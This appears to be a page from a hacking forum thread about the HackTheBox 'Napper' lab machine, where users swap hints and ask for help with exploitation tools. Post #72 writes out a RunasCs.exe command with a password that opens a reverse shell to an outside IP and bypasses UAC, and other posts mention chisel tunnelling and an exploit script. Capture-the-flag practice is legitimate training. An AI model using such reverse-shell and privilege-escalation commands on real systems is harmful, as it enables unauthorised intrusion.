HTB - Napper
by peRd1 - Saturday November 11, 2023 at 07:18 PM
#71
(Nov 11, 2023, 08:08 PM)Akless Wrote: /ews/MsExgHealthCheckd/

how did you find this endpoint?
Reply
#72
Can anyone tell me why i have errors here please?
<code>
C:\Temp\www\internal\content\posts\internal-laps-alpha>.\RunasCs.exe backup ytkCAMAGNEfDiMAvFpdEVGyNzQotkczpxOstRvNT cmd.exe -r 10.10.16.64:4444 -t 8 --bypass-uac
.\RunasCs.exe backup ytkCAMAGNEfDiMAvFpdEVGyNzQotkczpxOstRvNT cmd.exe -r 10.10.16.64:4444 -t 8 --bypass-uac

Unhandled Exception: System.MissingMethodException: Method not found: 'System.String[] System.String.Split(Char, System.StringSplitOptions)'.
  at RunasCsMainClass.ValidateRemote(String remote)
  at RunasCsMainClass.RunasCsMain(String[] args)
  at MainClass.Main(String[] args)
</code>
Reply
#73
(Nov 15, 2023, 05:21 PM)scp Wrote:
(Nov 11, 2023, 08:08 PM)Akless Wrote: /ews/MsExgHealthCheckd/

how did you find this endpoint?

You need to read the malweare analysis in the web site. 
First you need to find the host name with enum.
Then you need to find a user (try to read the blog post)
And then you will have more information about the  /ews/MsExgHealthCheckd/
Reply
#74
(Nov 12, 2023, 02:18 PM)maybemia Wrote:
(Nov 12, 2023, 02:01 PM)tazarkour Wrote:
(Nov 12, 2023, 01:53 PM)peRd1 Wrote:
(Nov 12, 2023, 01:42 PM)tazarkour Wrote:
(Nov 12, 2023, 01:40 PM)VfV Wrote: +1 , what were the steps involved in order to arrive there? I'm trying to learn

Maybe they used a custom dict or just saw the name of the machine so they recognized the vulnerability.
Read the blog posts, entries, on the website and its internal sites, once you could logon there. It's all there, also specifies sources regarding that vulnerability.

How can I login there ?

I find something useful in "https://app.napper.htb/posts/setup-basic-auth-powershell/" step 6, which solve my problem. Thanks. It seams I need to learn more recon things.

Gosh this is a good lesson to start reading stuff
Reply
#75
About this script:
https://github.com/Burly0/HTB-Napper
I did not get shell, what is problem ?
Reply
#76
(Nov 17, 2023, 11:02 AM)monkeythefirst Wrote: About this script:
https://github.com/Burly0/HTB-Napper
I did not get shell, what is problem ?
why it,s not working tell me
Reply
#77
I'm not able to port forward to port 9200 using chisel, I'm getting this error:
curl: (35) OpenSSL SSL_connect: SSL_ERROR_SYSCALL in connection to 127.0.0.1:9200



Can someone help me?
Reply
#78
Make sure you are in a place you can execute like C:\Temp\
Reply
#79
My chisel isn't working, am getting blank output
Reply
#80
Hi everybody. PLS help with two questions:
1. how long do seed and hash live? After decryption i got result "username or password not correct"
2. What options with RunasCs.exe need? No result
Thanks advance.
Reply


Possibly Related Threads…
Thread Author Replies Views Last Post
  [FREE] HackTheBox Dante - complete writeup written by Tamarisk Tamarisk 602 91,760 5 hours ago
Last Post: sabero_exe
  [FREE] CPTS 12 FLAGS pulsebreaker 68 1,963 Yesterday, 09:54 AM
Last Post: VictorPipeau
  [FREE] 300+ Writeups PDF HackTheBox/HTB premium retired Tamarisk 371 92,893 Yesterday, 08:48 AM
Last Post: phannguyenbaouy1
  [FREE] HackTheBox Academy - CBBH CDSA CPTS All Modules Flags Techtom 21 2,621 Yesterday, 05:08 AM
Last Post: popoler
  Hack the box Pro Labs, VIP, VIP+ 1 month free Method RedBlock 23 2,273 Apr 30, 2026, 02:10 PM
Last Post: kkkato

Forum Jump:


 Users browsing this forum: 1 Guest(s)